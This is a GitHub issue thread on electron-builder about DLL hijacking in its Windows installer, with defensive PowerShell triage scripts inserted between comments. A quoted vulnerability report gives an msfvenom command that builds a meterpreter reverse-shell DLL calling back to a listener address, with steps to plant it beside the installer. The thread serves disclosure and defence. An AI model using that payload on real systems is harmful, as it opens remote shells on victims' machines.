electron-userland / electron-builder

A complete solution to package and build a ready for distribution Electron app with “auto update” support out of the box
https://www.electron.build
MIT License
13.56k stars, 1.73k forks

DLL Hijacking In Windows Installer #3248

Open kspearrin opened 6 years ago

kspearrin commented 6 years ago

We received the following report from a security researcher on HackerOne about our application. I am not sure if it is valid, but here is what was reported:

I would like to report that the xxxxx-installer.exe is vulnerable to DLL hijacking on the following library:

C:\Windows\SYSTEM32\CRYPTSP.DLL

In order to recreate the issue, simply generate a malicious DLL using metasploit with the following command: "msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.123.12.3 LPORT=4444 -f DLL >CRYPTSP.DLL" and place the malicious DLL in the same folder as where the installation executable will be run from on the client machine.

This was tested on a fully patched Windows 7 professional client.

Impact: RCE on the client computer
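
The report above boils down to search-order hijacking: the installer asks for CRYPTSP.DLL by name, and a copy sitting in the installer's own directory is found before the real one in System32. The following is an added triage script, not part of the report, this issue or electron-builder, for checking a machine for exactly that pattern: DLLs lying next to an executable whose name shadows a System32 DLL, compared against the System32 copy by hash and Authenticode status. It assumes Windows PowerShell 5.1 or later; the function name Find-ShadowedDll and the default search folders (the user's Downloads and TEMP, where downloaded installers are usually run from) are my choices.

```powershell
# Added example (not from the issue or electron-builder): find DLLs planted beside
# executables whose file name shadows a DLL that normally resolves from System32.
# Assumes Windows PowerShell 5.1+; folder list and output fields are assumptions.

function Find-ShadowedDll {
    [CmdletBinding()]
    param(
        # Folders users typically run downloaded installers from (assumption).
        [string[]]$Path = @("$env:USERPROFILE\Downloads", $env:TEMP)
    )

    $system32 = Join-Path $env:SystemRoot 'System32'

    foreach ($dir in $Path) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }

        # A planted DLL needs a victim process started from the same folder,
        # so only directories that also contain an .exe are interesting.
        $exes = Get-ChildItem -LiteralPath $dir -Filter *.exe -File -Recurse -ErrorAction SilentlyContinue

        foreach ($dll in Get-ChildItem -LiteralPath $dir -Filter *.dll -File -Recurse -ErrorAction SilentlyContinue) {
            $canonical = Join-Path $system32 $dll.Name
            if (-not (Test-Path -LiteralPath $canonical)) { continue }   # name shadows nothing in System32

            $sibling = $exes | Where-Object { $_.DirectoryName -eq $dll.DirectoryName }
            if (-not $sibling) { continue }

            $planted   = (Get-FileHash -LiteralPath $dll.FullName -Algorithm SHA256).Hash
            $reference = (Get-FileHash -LiteralPath $canonical -Algorithm SHA256).Hash
            $sig       = Get-AuthenticodeSignature -LiteralPath $dll.FullName

            [pscustomobject]@{
                Dll            = $dll.FullName
                ShadowsSystem  = $canonical
                SiblingExes    = ($sibling.Name -join ', ')
                HashMatchesSys = ($planted -eq $reference)
                SignatureState = $sig.Status                   # Valid, NotSigned, HashMismatch, ...
                Signer         = $sig.SignerCertificate.Subject # $null when unsigned
            }
        }
    }
}

# Usage: list every shadowing DLL that is not byte-identical to the System32 copy.
Find-ShadowedDll | Where-Object { -not $_.HashMatchesSys } | Format-List
```

A hash mismatch on its own is not proof of an attack: 32-bit installers resolve against SysWOW64 rather than System32, and some applications legitimately ship their own copy of a runtime DLL next to the executable. An unsigned or non-Microsoft-signed file carrying a Windows DLL name next to an installer is the combination worth pulling for analysis; reproducing the load with the installer running under Process Monitor then confirms whether the installer actually picks it up from its own directory, as the reporter claims for CRYPTSP.DLL.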

Metnew commented 5 years ago

Any updates on this? Seems quite serious

tassoevan commented 5 years ago

I've received a report suggesting that SECUR32.DLL could be exploited too.

mceachen commented 5 years ago

Seems quite serious

@kspearrin doesn't the patched DLL have to be copied on the user's machine, which means the host is already compromised, at least to some degree?

jahidzaynal commented 5 years ago

@kspearrin doesn't the patched DLL have to be copied on the user's machine, which means the host is already compromised, at least to some degree?

Yes, but if I understand it correctly, the attacker could potentially just copy a DLL into a folder on the machine that doesn't require privileged access; through the electron installer they will be able to get privileged access as soon as the malicious DLL gets run by electron. Hence electron causes the severity of the hijack to be escalated. Or, for example, they could put remote execution code in a DLL and wait until that DLL gets run by the user, giving the attacker remote execution abilities.
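
The escalation argument in the comment above rests on two facts about a specific installer and a specific folder: a low-privileged account can write into the directory the installer is run from, and the installer runs elevated. The following added check (not from this thread or electron-builder) reports both for a given installer so the severity can be assessed rather than assumed. It assumes Windows PowerShell 5.1 or later; the function name Test-InstallerHijackExposure, the list of identities treated as "low privileged", and the use of a raw text scan of the binary for the embedded manifest's requestedExecutionLevel are my choices.

```powershell
# Added example (not from the issue or electron-builder): does the folder the installer
# runs from accept writes from low-privileged principals, and does the installer ask
# to run elevated? Assumes Windows PowerShell 5.1+; identity list is an assumption.

function Test-InstallerHijackExposure {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Installer)

    $file = Get-Item -LiteralPath $Installer
    $dir  = $file.DirectoryName

    # 1. Can a non-administrator write into the directory the installer runs from?
    #    Well-known broad groups only (assumption); a folder inside one user's profile
    #    is writable by that user alone, which is the "already compromised" case above.
    $acl = Get-Acl -LiteralPath $dir
    $lowPrivWriters = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -match '\\(Users|Everyone|Authenticated Users)$|^Everyone$' -and
        $_.FileSystemRights   -match 'Write|Modify|FullControl|CreateFiles'
    }

    # 2. Does the installer request elevation?  The application manifest is stored as
    #    plain XML in the resource section, so a raw text scan is enough for triage.
    $raw   = [System.IO.File]::ReadAllText($file.FullName, [System.Text.Encoding]::ASCII)
    $level = if ($raw -match 'requestedExecutionLevel[^>]*level="([^"]+)"') { $Matches[1] } else { 'none' }

    [pscustomobject]@{
        Installer               = $file.FullName
        Directory               = $dir
        NonAdminCanWrite        = [bool]$lowPrivWriters
        LowPrivWriters          = ($lowPrivWriters.IdentityReference -join ', ')
        RequestedExecutionLevel = $level                  # requireAdministrator / asInvoker / highestAvailable / none
        # The privilege escalation described in the comment exists only when both hold.
        EscalationPath          = ([bool]$lowPrivWriters -and $level -eq 'requireAdministrator')
    }
}

# Usage:
Test-InstallerHijackExposure -Installer 'C:\Users\Public\Downloads\xxxxx-installer.exe' | Format-List
```

EscalationPath = True means a DLL dropped by any local user would execute with administrative rights when another user runs the installer; False with NonAdminCanWrite = False means the planted DLL already required the victim's own write access, which is the point raised two comments above. An installer whose manifest says asInvoker can still be hijacked, but the payload then runs at the launching user's privilege and the finding is a code-execution-as-the-victim issue rather than an elevation.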

stale[bot] commented 5 years ago

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

kspearrin commented 5 years ago

Still an open issue.